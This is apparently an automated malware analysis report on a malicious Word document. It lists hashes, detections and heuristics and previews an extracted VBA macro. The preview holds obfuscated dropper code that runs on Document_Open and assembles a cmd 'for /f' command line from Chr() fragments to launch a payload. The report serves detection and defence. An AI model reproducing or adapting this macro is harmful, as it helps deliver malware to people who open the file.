Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e401b72ed7d43a35…

MALICIOUS

Office (OLE)

Size: 280.0 KB
Created: 2018-07-16 00:44:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 5c6e87e007d408c00473d0bf7b15d839
SHA-1: 9b65e1dadbacceb52230f1f272ddfe6a2acefd71
SHA-256: e401b72ed7d43a35792a15dbc253ff9b037923f80bdcd166afac8fa3b32fed70
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_open event and calls the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection and the heuristic firings strongly suggest this is a dropper designed to download and execute a secondary payload.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6611979-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6611979-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 59485 bytes
SHA-256: d5cc17ba25d97d515227f8a701cfb4ecd2b5432dbe3cdf0bad0b9840ceed421b
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "kjaMLZDqvI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function aFqlScTGlMKCMV()
   Zzavkv = (JIcaj / JhZrS + CVQioT + qupLHC / (95917 / zBJnVJ - uDBfia + CrCOAH))
   lvCmw = (wusJFW / vbZtf + QLiIhI + ztEMD / (34571 / ORzzvE - wnodLT + FBiKVE))
   rqQOR = (rqjiK / YvCZc + uhbvd + FotIR / (44280 / kiGFz - MiGNz + jRthq))
   ppicqn = (EBdCn / EiuzTi + AzowOw + vvnEr / (77974 / kDSQhR - pBpAwz + jfjmDJ))
   QmbJF = (UzVXl / LjQEwf + aNhIo + trzJs / (4822 / PokXLM - UaGjH + jkVbwS))
   pvjdmI = (aXndV / iXvssj + uAGBBv + JWVKa / (64909 / ZsBtYE - uCSDmz + NaiFi))
   BkNsUH = (OYKzw / bbilN + LwwzPw + MQESo / (58940 / sCiDp - ijnRpz + cHDAA))
End Function
Function QqPCsmTAHTU()
   cRBBuB = (nFWdm / HCwTWX + YNavh + jjMkMP / (10982 / OzoLtQ - ZYczbq + hEnnn))
   zzAWD = (tECPzS / fKpzlr + XvCzQ + qWbQd / (83626 / pMnRh - izbOb + kDGJL))
   ZSJqP = (DwdFEF / rPdXn + nLwMTF + Qkqsst / (6896 / VnRjw - ZuiVcZ + GKRwq))
   PrFTT = (ZaVJO / qtFKHd + ozozw + lbwIz / (49331 / LlwFjr - zBzDS + vzOcuf))
   FKbuHO = (qbSYkm / EuzbQ + HnAki + KlMVN / (34669 / uFbXL - drIahf + zauUdT))
End Function
Private Sub Document_open()
On Error Resume Next
   Vffznh = (kPcLj / kiPNMX + LSLXU + ZwuiSv / (57071 / izvLq - zSiqD + CDSlMB))
   KRwKvH = (XIChdo / pWpNh + LimAX + wvIjr / (95751 / DdaId - IDtTOj + ozAaNv))
   hlqIub = (bMGWD / mowJb + mJafp + zoRBAj / (28250 / qMGVb - oImQt + twQJo))
   RKjISc = (AnEAl / fKtrXI + EjTXN + Ponjhz / (38910 / rLkQPW - dAiwP + znmwT))
zLwff = Application.Run("zWJKsklnbQQnE", "" + DUHcsHMpjK + HChTCVP + CVar("c") + nUUYsVfJVQYiw + nizBkdwjnqu + UoOWrk + AzworpuKw + RrwOjtXiX + MOXtFaIrwG + FijivZMcniN + iuoZLPMjXP + TkCsPT + MQNLnPmzHkt + LRwdXiqC + ALjaisctV + fplpqmcAClF + LmHMU + ljOrAIYH + GJJHVH + YNPdkNp + rLjSI + jJwNj + qdrudszHcw + BuhwdSJ + fQwQTkwSVKz + kzZdEfmuN + dELBFzRjMdG + qHGQH + AInkEAGvFHw + ostAHktKAz + VPrbwwpD + NmQXNwjX + ATGFBhwn + LXHsaahdhFT)
   KEOhh = (jfAbzL / ZJjzuc + XwRNvS + WvBIk / (49631 / msFmS - iJNML + uiKAKs))
   Klhhz = (HMXND / WGATu + BMMFW + AXqcLv / (31580 / WzwUUz - PoOnJE + EUjKnf))
End Sub
Function MmBmPHKkzTNlim()
   MZtip = (MDuLz / UszkP + zYEQLv + jEqSP / (75494 / hDlrDw - DUwpjV + VQDvcu))
   McGDOk = (BCXpL / qPjtKa + EADNY + NtwHL / (84103 / azQwdj - hzkrSw + JDjsYM))
   SvNzFF = (WkfYR / QGIjRm + DIafat + omWms / (36427 / lpdFsl - wLKHDv + JvPKH))
   JViXMs = (jOsfwq / QiaYBK + zQXWz + irGcl / (3906 / bUvhj - HPwRcE + asQol))
End Function


Attribute VB_Name = "MEKAOkzrHQu"
Function UoOWrk()
On Error Resume Next
hUWYj = (7254 * 15043 + 29456 * noolm - utsEw * 23646 + VXVuf + 17414 + (mwQOf + zutVhp))
   dHGtQ = zwBIQ + KwzDm - 47035 + NNrYZG + 76910 + zzWWI + BsQOAP + EnuHwR / BvqjJq / Hljhn
cMEqYooR = CStr(Chr(QEwswjsWBQap + zFlzHAorhvbOh + 109 + JwLYbtnoso + tmoidiPuzq)) + "d /" + CStr(Chr(zsZWARkzQCr + RozLQtJNc + 99 + sNwfRhU + iajURnb)) + " f^or " + " , , /" + "f ; ;" + " " + CStr(Chr(HqvXTMtQjizmQU + dnTFhiiYNj + 34 + fudRFSU + VtlmBzlW)) + "   to" + "ken" + "s" + "= 2 d" + "e" + "li" + CStr(Chr(FlznzIwNZ + KmVokpFfjz + 109 + KIthSjkzBwOkT + dIHFvwmL))
wfmHbJ = iplJB + awQap - 952 + EJmNS + 47283 + GhhNmL + pPVrq + vMBzzp / hpSGz / NtosYo
ztCcdcjLPZ = "s=g" + "HFos" + CStr(Chr(zQIfqkUFt + FbfhpKVOYkU + 34 + bWZsEwXznQVP + KLtiapcXh)) + " " + "; " + "%^" + CStr(Chr(GlRzhfcKZD + cBwRhSKK + 99 + tKCfGuPG + zTwKGzFlsEDNq)) + "  , i" + "n" + " "
BHYWqC = hujzWc + IoNdUM - 33294 + aPKzM + 921 + wCnPw + tZdwB + HYXwFl / jDLLi / hmhIL
   kKzjMH = fPPkiT + JqDRF - 23419 + USlrE + 24518 + YMRRG + Mzaqm + FXQobj / mYwdr / jfQrM
   uRGDw = YHEMQ + iGHnD - 58808 + Kpaqc + 66149 + LZjwF + CiEoQ + qIIHi / jRMzZ / MNCdST
BdipUS = ", ( " + " , ' ;" + "  " + "; FTY" + "p^" + "^E" + " , ^" + "|  ;" + " FIN"
YHwbH = BKzCS + qoBCi - 85132 + wRMLAn + 68337 + LYMkNm + RAJfaF + GNzGVW / Abkbw / DLwwoY
ElRcz
... (truncated)